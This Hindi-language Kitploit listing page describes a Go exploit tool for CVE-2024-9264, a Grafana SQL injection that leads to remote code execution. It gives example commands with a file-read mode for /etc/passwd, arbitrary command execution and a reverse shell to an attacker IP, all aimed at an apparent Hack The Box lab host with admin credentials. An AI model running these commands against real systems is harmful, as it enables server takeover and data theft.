Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-9264 — CVE-2024-9264 के लिए एक Go इम्प्लीमेंटेशन जो grafana संस्करण 11.0.x, 11.1.x, और 11.2.x को प्रभावित करता है। | Kitploit
उपकरण/GitHubGitHub/cythonic1/cve-2024-9264
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubcythonic1/cve-2024-9264

CVE-2024-9264

CVE-2024-9264 के लिए एक Go इम्प्लीमेंटेशन जो grafana संस्करण 11.0.x, 11.1.x, और 11.2.x को प्रभावित करता है।

रिपॉजिटरी देखें
31 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

🚨 CVE-2024-9264 - Grafana SQL इंजेक्शन जिससे रिमोट कोड एक्सेक्यूशन (RCE) और फ़ाइल रीड संभव है

यह CVE-2024-9264 के लिए एक एक्सप्लॉइट टूल है, जो Grafana में एक गंभीर भेद्यता है जो प्रमाणित हमलावर को SQL क्वेरी निष्पादित करने की अनुमति देती है, जिससे RCE हो सकता है।

🛡️ यह टूल पूर्णतः शैक्षिक उद्देश्यों और अधिकृत पेनेट्रेशन टेस्टिंग के लिए है।
अनधिकृत उपयोग अवैध और अनैतिक है।


🧠 भेद्यता अवलोकन

🕳️ CVE-2024-9264 क्या है?

CVE-2024-9264 Grafana में एक गंभीर कमजोरी है जो प्रमाणित हमलावर को SQL कमांड निष्पादित करने की अनुमति देती है, जिससे RCE और फ़ाइल रीड संभव होते हैं।

🧬 मूल कारण

  • अपर्याप्त सैनिटाइज़ेशन।

💥 प्रभाव

  • RCE: मनमाने कमांड निष्पादित करें, रिवर्स शेल प्राप्त करें, या संवेदनशील फ़ाइलें पढ़ें।
  • उच्च गंभीरता: सफल होने पर सर्वर का पूर्ण अधिग्रहण संभव है।

⚒️ विशेषताएँ

  • कई अटैक मोड का समर्थन करता है:
    • file – मनमानी फ़ाइलें पढ़ें (जैसे, /etc/passwd)
    • shell – हमलावर की मशीन पर रिवर्स शेल
    • command – मनमाने शेल कमांड चलाएँ (जैसे, whoami)
  • अनुकूलन योग्य हमलावर IP, पोर्ट और क्रेडेंशियल्स

🚀 उपयोग

help menu

सभी आर्ग्युमेंट्स आवश्यक नहीं हैं।

उदाहरण

शेल प्राप्त करना

go run main.go -ip 10.10.16.91 -port 8080 -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type shell

फ़ाइलें पढ़ना

go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type file -filename /etc/passwd

एकल कमांड निष्पादित करें

go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type command -cmd 'ls -al'

🔧 कमांड-लाइन फ़्लैग्स

go run main.go [flags]

टूल डाउनलोड करें